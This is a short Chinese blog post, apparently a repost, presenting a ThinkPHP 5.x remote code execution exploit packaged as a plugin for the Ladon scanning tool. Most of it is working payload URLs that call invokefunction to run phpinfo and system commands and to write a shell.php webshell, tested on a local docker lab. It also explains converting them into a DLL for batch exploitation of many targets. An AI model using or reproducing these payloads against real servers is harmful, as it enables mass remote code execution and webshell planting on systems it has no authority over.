码迷,mamicode.com
首页 > Web开发 > 详细

Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit

时间:2020-02-14 16:22:50      阅读:108      评论:0      收藏:0      [点我收藏+]

标签:cal   dll   前言   批量   gets   href   写入   inf   利用   

前言

使用Exp生成器生成Ladon插件实战,ThinkPHP GetShell

漏洞环境

使用docker ThinkPHP 5.0.20

复现测试

Payload:

http://192.168.1.37:8080/index.php?s=/Index/\think\app/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=-1

执行命令

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=whoami

写入文件

GetShell1

http://192.168.1.37:8080/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=system&vars[1][]=echo 111111>shell.php

GetShell2

/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=URL编码内容

视频教程

通过EXP生成器将以上Payload转成DLL,使用Ladon即可批量利用,详情请观看视频教程

Video: K8Cscan ThinkPHP 5.x RCE Exploit

Ladon插件ThinkPHP 5.0.22 5.1.29 GetShell Exploit

标签:cal   dll   前言   批量   gets   href   写入   inf   利用   

原文地址:https://www.cnblogs.com/k8gege/p/12307453.html

(0)
(0)
   
举报
评论 一句话评论(0
登录后才能评论!
© 2014 mamicode.com 版权所有  联系我们:gaon5@hotmail.com
迷上了代码!